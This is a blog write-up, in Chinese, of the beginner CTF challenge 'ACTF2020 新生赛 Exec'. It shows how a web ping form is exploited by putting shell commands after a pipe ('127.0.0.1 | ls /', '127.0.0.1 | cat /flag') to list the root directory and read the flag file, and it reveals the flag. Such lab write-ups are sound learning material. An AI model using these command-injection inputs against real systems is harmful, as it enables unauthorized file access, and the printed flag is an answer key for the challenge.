

[ACTF2020 新生赛]Exec 1

原创

QS636 已于 2022-04-10 11:00:10 修改 8 收藏

文章标签: [web安全](#)

于 2022-04-10 02:03:01 首次发布

版权声明: 本文为博主原创文章, 遵循 [CC 4.0 BY-SA](#) 版权协议, 转载请附上原文出处链接和本声明。

本文链接: https://blog.csdn.net/weixin_61333161/article/details/124071769

版权

题目:[ACTF2020 新生赛]Exec 1

题目来源:[https://buuoj.cn/challenges#\[ACTF2020%E6%96%B0%E7%94%9F%E8%B5%9B\]Exec](https://buuoj.cn/challenges#[ACTF2020%E6%96%B0%E7%94%9F%E8%B5%9B]Exec)

[ACTF2020 新生赛]Exec 1

感谢 Y1ng 师傅供题。

靶机信息

剩余时间: 10779s

<http://56113fbb-3fae-4558-a88f-fbe18f04b2f6.node4.buoj.cn:81>

销毁靶机

靶机续期

已解锁

CSDN@QS636

分析过程

进入靶场发现如下界面

PING

请输入需要ping的地址

PING

CSDN@QS636

尝试ping一下主机地址 127.0.0.1, 成功ping通

PING

请输入需要ping的地址

PING

```
PING 127.0.0.1 (127.0.0.1): 56 data bytes  
CSDN @ QS636
```

利用ls命令查看根目录下所有文件 `127.0.0.1 | ls /`,显示有

PING

请输入需要ping的地址

PING

```
bin  
dev  
etc  
flag  
home  
lib  
media  
mnt  
opt  
proc  
root  
run  
sbin  
srv  
sys  
tmp  
usr  
var
```

CSDN @ QS636

查看发现存在flag文件，使用cat命令打印出来看一下 `127.0.0.1 | cat /flag`，如图

PING

请输入需要ping的地址

PING

```
flag{8efe05c4-625f-400a-a737-4c8dfe55e346}
```

CSDN @QS636

成功获得flag: *flag{8efe05c4-625f-400a-a737-4c8dfe55e346}*